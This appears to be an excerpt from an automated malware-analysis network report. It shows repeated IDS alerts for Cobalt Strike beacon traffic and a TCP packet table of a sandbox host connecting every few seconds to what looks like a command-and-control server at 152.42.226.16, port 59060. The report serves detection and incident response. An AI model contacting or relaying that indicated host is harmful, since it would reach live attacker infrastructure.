                          2024-12-26T19:29:37.940700+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449846152.42.226.1659060TCP
                          2024-12-26T19:29:40.833437+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449852152.42.226.1659060TCP
                          2024-12-26T19:29:43.731451+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449858152.42.226.1659060TCP
                          2024-12-26T19:29:46.671469+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449869152.42.226.1659060TCP
                          2024-12-26T19:29:49.566010+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449875152.42.226.1659060TCP
                          2024-12-26T19:29:52.473411+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449881152.42.226.1659060TCP
                          2024-12-26T19:29:55.539263+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449887152.42.226.1659060TCP
                          2024-12-26T19:29:58.426729+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449896152.42.226.1659060TCP
                          2024-12-26T19:30:01.355750+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449904152.42.226.1659060TCP
                          2024-12-26T19:30:04.261831+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449910152.42.226.1659060TCP
                          2024-12-26T19:30:07.144332+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449916152.42.226.1659060TCP
                          2024-12-26T19:30:10.036173+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449925152.42.226.1659060TCP
                          2024-12-26T19:30:12.925060+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449933152.42.226.1659060TCP
                          2024-12-26T19:30:16.035600+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449939152.42.226.1659060TCP
                          2024-12-26T19:30:18.931747+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449945152.42.226.1659060TCP
                          2024-12-26T19:30:21.832539+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449954152.42.226.1659060TCP
                          2024-12-26T19:30:24.725469+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449962152.42.226.1659060TCP
                          2024-12-26T19:30:27.613095+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449968152.42.226.1659060TCP
                          2024-12-26T19:30:30.503531+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449973152.42.226.1659060TCP
                          2024-12-26T19:30:33.410620+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449978152.42.226.1659060TCP
                          2024-12-26T19:30:36.319540+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449987152.42.226.1659060TCP
                          2024-12-26T19:30:39.298482+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.449994152.42.226.1659060TCP
                          2024-12-26T19:30:42.223934+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450000152.42.226.1659060TCP
                          2024-12-26T19:30:45.113944+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450009152.42.226.1659060TCP
                          2024-12-26T19:30:48.020191+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450016152.42.226.1659060TCP
                          2024-12-26T19:30:50.913584+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450022152.42.226.1659060TCP
                          2024-12-26T19:30:53.801887+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450029152.42.226.1659060TCP
                          2024-12-26T19:30:56.737650+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450036152.42.226.1659060TCP
                          2024-12-26T19:30:59.629939+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450045152.42.226.1659060TCP
                          2024-12-26T19:31:02.519995+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450050152.42.226.1659060TCP
                          2024-12-26T19:31:05.411871+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450056152.42.226.1659060TCP
                          2024-12-26T19:31:08.305535+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450063152.42.226.1659060TCP
                          2024-12-26T19:31:11.209608+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450067152.42.226.1659060TCP
                          2024-12-26T19:31:14.098124+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450068152.42.226.1659060TCP
                          2024-12-26T19:31:16.988917+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450069152.42.226.1659060TCP
                          2024-12-26T19:31:19.896222+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450070152.42.226.1659060TCP
                          2024-12-26T19:31:22.845151+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450071152.42.226.1659060TCP
                          2024-12-26T19:31:25.755345+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450072152.42.226.1659060TCP
                          2024-12-26T19:31:28.660857+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450073152.42.226.1659060TCP
                          2024-12-26T19:31:31.559825+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450074152.42.226.1659060TCP
                          2024-12-26T19:31:34.521650+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450075152.42.226.1659060TCP
                          2024-12-26T19:31:37.583462+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450076152.42.226.1659060TCP
                          2024-12-26T19:31:40.475090+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450077152.42.226.1659060TCP
                          2024-12-26T19:31:43.731887+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450078152.42.226.1659060TCP
                          2024-12-26T19:31:46.633605+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450079152.42.226.1659060TCP
                          2024-12-26T19:31:49.520544+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450080152.42.226.1659060TCP
                          2024-12-26T19:31:52.413722+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450081152.42.226.1659060TCP
                          2024-12-26T19:31:55.302479+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450082152.42.226.1659060TCP
                          2024-12-26T19:31:58.236196+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450083152.42.226.1659060TCP
                          2024-12-26T19:32:01.240049+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450084152.42.226.1659060TCP
                          2024-12-26T19:32:04.130504+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.450085152.42.226.1659060TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 26, 2024 19:27:58.381906033 CET4973059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:27:58.501657009 CET5906049730152.42.226.16192.168.2.4
                          Dec 26, 2024 19:27:58.501773119 CET4973059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:27:58.501960039 CET4973059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:27:58.621462107 CET5906049730152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:01.173985004 CET5906049730152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:01.174082041 CET4973059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:01.174201012 CET4973059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:01.284480095 CET4973159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:01.293832064 CET5906049730152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:01.404340029 CET5906049731152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:01.404429913 CET4973159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:01.404603958 CET4973159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:01.525646925 CET5906049731152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:04.065500975 CET5906049731152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:04.065607071 CET4973159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:04.065776110 CET4973159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:04.188317060 CET5906049731152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:04.205208063 CET4973259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:04.324865103 CET5906049732152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:04.324954987 CET4973259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:04.326299906 CET4973259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:04.445831060 CET5906049732152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:07.008816957 CET5906049732152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:07.008994102 CET4973259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:07.008994102 CET4973259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:07.125379086 CET4973359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:07.129863977 CET5906049732152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:07.245503902 CET5906049733152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:07.245574951 CET4973359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:07.245825052 CET4973359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:07.365350008 CET5906049733152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:09.938190937 CET5906049733152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:09.938290119 CET4973359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:09.938359022 CET4973359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:10.051434040 CET4973459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:10.057986975 CET5906049733152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:10.171535015 CET5906049734152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:10.171627045 CET4973459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:10.171814919 CET4973459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:10.292514086 CET5906049734152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:13.024419069 CET5906049734152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:13.024487019 CET4973459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:13.024561882 CET4973459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:13.128958941 CET4973559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:13.144754887 CET5906049734152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:13.248680115 CET5906049735152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:13.248749018 CET4973559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:13.248894930 CET4973559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:13.368614912 CET5906049735152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:15.921891928 CET5906049735152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:15.921977043 CET4973559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:15.922068119 CET4973559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:16.036178112 CET4973759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:16.042495966 CET5906049735152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:16.155747890 CET5906049737152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:16.155836105 CET4973759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:16.155977964 CET4973759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:16.275733948 CET5906049737152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:18.852616072 CET5906049737152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:18.852713108 CET4973759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:18.878941059 CET4973759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:18.990123987 CET4974159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:18.998482943 CET5906049737152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:19.110018969 CET5906049741152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:19.110097885 CET4974159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:19.110304117 CET4974159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:19.229834080 CET5906049741152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:21.863044977 CET5906049741152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:21.863364935 CET4974159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:21.863465071 CET4974159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:21.972388983 CET4974359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:21.982944965 CET5906049741152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:22.092065096 CET5906049743152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:22.092134953 CET4974359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:22.092303991 CET4974359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:22.211987019 CET5906049743152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:24.767355919 CET5906049743152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:24.767420053 CET4974359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:24.767528057 CET4974359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:24.880848885 CET4974559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:24.887006998 CET5906049743152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:25.001029968 CET5906049745152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:25.001147032 CET4974559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:25.001307964 CET4974559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:25.120786905 CET5906049745152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:27.658510923 CET5906049745152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:27.658628941 CET4974559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:27.658691883 CET4974559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:27.769164085 CET4974659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:27.778188944 CET5906049745152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:27.888797998 CET5906049746152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:27.888875961 CET4974659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:27.889086008 CET4974659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:28.009470940 CET5906049746152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:30.587101936 CET5906049746152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:30.587201118 CET4974659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:30.587260008 CET4974659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:30.690825939 CET4974759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:30.706803083 CET5906049746152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:30.810405970 CET5906049747152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:30.810489893 CET4974759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:30.810631990 CET4974759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:30.931967974 CET5906049747152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:33.469933987 CET5906049747152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:33.469999075 CET4974759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:33.470076084 CET4974759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:33.591033936 CET5906049747152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:33.607059002 CET4974859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:33.726680994 CET5906049748152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:33.726816893 CET4974859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:33.727039099 CET4974859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:33.846566916 CET5906049748152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:36.380842924 CET5906049748152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:36.381094933 CET4974859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:36.381165981 CET4974859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:36.489202976 CET4974959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:36.500874043 CET5906049748152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:36.608969927 CET5906049749152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:36.609054089 CET4974959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:36.613922119 CET4974959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:36.733736992 CET5906049749152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:39.298552036 CET5906049749152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:39.298765898 CET4974959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:39.298765898 CET4974959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:39.409729004 CET4975059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:39.419059992 CET5906049749152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:39.532253981 CET5906049750152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:39.532438040 CET4975059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:39.532476902 CET4975059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:39.652034044 CET5906049750152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:42.220810890 CET5906049750152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:42.220885992 CET4975059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:42.220958948 CET4975059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:42.333338976 CET4975159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:42.340542078 CET5906049750152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:42.453094959 CET5906049751152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:42.453190088 CET4975159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:42.453362942 CET4975159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:42.573633909 CET5906049751152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:45.126789093 CET5906049751152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:45.126842022 CET4975159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:45.126919031 CET4975159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:45.246484995 CET5906049751152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:45.311599970 CET4975259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:45.431130886 CET5906049752152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:45.431241035 CET4975259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:45.440135956 CET4975259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:45.561371088 CET5906049752152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:48.127335072 CET5906049752152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:48.127398014 CET4975259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:48.158183098 CET4975259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:48.273011923 CET4975359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:48.277904987 CET5906049752152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:48.396697998 CET5906049753152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:48.396774054 CET4975359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:48.397075891 CET4975359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:48.518801928 CET5906049753152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:51.077346087 CET5906049753152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:51.077523947 CET4975359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:51.077616930 CET4975359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:51.195455074 CET4975459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:51.197217941 CET5906049753152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:51.315269947 CET5906049754152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:51.315527916 CET4975459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:51.315757036 CET4975459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:51.435231924 CET5906049754152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:53.995269060 CET5906049754152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:53.995484114 CET4975459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:53.995588064 CET4975459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:54.097229004 CET4975559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:54.115704060 CET5906049754152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:54.217515945 CET5906049755152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:54.217698097 CET4975559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:54.218161106 CET4975559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:54.337990999 CET5906049755152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:56.948162079 CET5906049755152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:56.948292017 CET4975559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:56.979860067 CET4975559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:57.084100962 CET4975859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:57.099351883 CET5906049755152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:57.203691959 CET5906049758152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:57.203768015 CET4975859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:57.203973055 CET4975859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:57.323568106 CET5906049758152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:59.893759012 CET5906049758152.42.226.16192.168.2.4
                          Dec 26, 2024 19:28:59.893821001 CET4975859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:28:59.893956900 CET4975859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:00.004810095 CET4976459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:00.018047094 CET5906049758152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:00.131144047 CET5906049764152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:00.131216049 CET4976459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:00.131360054 CET4976459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:00.250821114 CET5906049764152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:02.784812927 CET5906049764152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:02.785027981 CET4976459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:02.785027981 CET4976459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:02.894084930 CET4977059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:02.906250954 CET5906049764152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:03.033308983 CET5906049770152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:03.033422947 CET4977059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:03.033688068 CET4977059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:03.214739084 CET5906049770152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:05.752500057 CET5906049770152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:05.752619028 CET4977059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:05.752715111 CET4977059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:05.864645958 CET4977659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:05.872536898 CET5906049770152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:05.984224081 CET5906049776152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:05.984334946 CET4977659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:05.984513998 CET4977659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:06.106645107 CET5906049776152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:08.643415928 CET5906049776152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:08.643491983 CET4977659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:08.646202087 CET4977659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:08.755592108 CET4978259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:08.769798994 CET5906049776152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:08.875336885 CET5906049782152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:08.875538111 CET4978259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:08.875693083 CET4978259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:08.995280981 CET5906049782152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:11.533996105 CET5906049782152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:11.534105062 CET4978259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:11.535875082 CET4978259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:11.646469116 CET4978859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:11.657885075 CET5906049782152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:11.766161919 CET5906049788152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:11.766273975 CET4978859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:11.766458035 CET4978859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:11.886267900 CET5906049788152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:14.424277067 CET5906049788152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:14.424352884 CET4978859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:14.424458027 CET4978859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:14.534986019 CET4979459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:14.544081926 CET5906049788152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:14.654622078 CET5906049794152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:14.654738903 CET4979459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:14.654863119 CET4979459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:14.774420977 CET5906049794152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:17.315108061 CET5906049794152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:17.315336943 CET4979459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:17.315431118 CET4979459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:17.427928925 CET4980559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:17.435002089 CET5906049794152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:17.547877073 CET5906049805152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:17.547954082 CET4980559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:17.548139095 CET4980559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:17.667715073 CET5906049805152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:20.206419945 CET5906049805152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:20.206541061 CET4980559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:20.206563950 CET4980559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:20.325421095 CET4981159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:20.326260090 CET5906049805152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:20.445081949 CET5906049811152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:20.445197105 CET4981159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:20.445466042 CET4981159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:20.571774960 CET5906049811152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:23.112092972 CET5906049811152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:23.112154007 CET4981159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:23.112220049 CET4981159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:23.225373030 CET4981759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:23.231843948 CET5906049811152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:23.509383917 CET5906049817152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:23.509493113 CET4981759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:23.509773970 CET4981759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:23.629334927 CET5906049817152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:26.230084896 CET5906049817152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:26.230192900 CET4981759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:26.230300903 CET4981759060192.168.2.4152.42.226.16
